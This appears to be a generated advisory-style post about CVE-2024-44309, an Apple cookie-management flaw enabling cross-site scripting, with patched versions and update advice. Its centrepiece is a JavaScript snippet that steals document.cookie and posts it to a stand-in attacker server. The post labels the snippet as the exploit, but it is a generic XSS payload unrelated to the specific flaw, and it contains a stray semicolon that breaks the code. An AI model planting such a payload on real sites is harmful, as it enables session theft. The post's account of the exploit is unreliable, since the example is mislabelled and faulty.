CVE-2024-44309 - Apple Security Update Addresses Serious Cookie Management Vulnerability Leading to Cross-Site Scripting Attacks

In recent security updates, Apple has addressed a significant cookie management issue (CVE-2024-44309) that could potentially lead to cross-site scripting (XSS) attacks on websites accessed through affected versions of Safari, iOS, and macOS. This vulnerability targets Intel-based Mac systems, and Apple has received reports of these exploits being actively used in the wild. To mitigate this risk, Apple has released updates which include Safari 18.1.1, iOS 17.7.2, and iPadOS 17.7.2, macOS Sequoia 15.1.1, iOS 18.1.1, and iPadOS 18.1.1, visionOS 2.1.1.

The exploited vulnerability involves the improper management of cookies, allowing malicious web content to engage in Cross-Site Scripting (XSS) attacks. An example code snipplet exhibiting the exploit is shown below:

<script>
    function stealCookies() {
        var stolenCookie = document.cookie;
        //send stolen cookies to the attacker's server
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://attacker-server.com/collect-cookie";, true);
        xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
        xhr.send(JSON.stringify({'data': stolenCookie}));
    }
    stealCookies();
</script>

This malicious code snippet demonstrates how an attacker can steal a user's cookies and send them to their server for illegitimate activities, which may result in consequences as severe as unauthorized access to sensitive user data or accounts.

For further reference regarding this vulnerability and others fixed in recent security updates, please consult the official Apple security updates page at https://support.apple.com/en-us/HT212778.

Users are strongly encouraged to update their devices and operating systems immediately to the latest versions, which include fixes for this issue. To prevent other security vulnerabilities from affecting your device, always promptly apply software updates and only visit websites you trust. Additionally, it's essential to maintain caution when opening links, attachments, or files from unfamiliar sources to protect your computer from potential attacks.

In summary, CVE-2024-44309 represents a serious vulnerability in cookie management, allowing malicious web content to initiate cross-site scripting attacks. Users of affected versions of Safari, iOS, and macOS should immediately update their devices to the most recent version to protect their sensitive data and accounts from unauthorized access. Stay vigilant online and remember to follow security best practices, including keeping software updated and cautiously handling links and files from unknown sources.

Timeline

Published on: 11/20/2024 00:15:17 UTC
Last modified on: 11/29/2024 18:28:16 UTC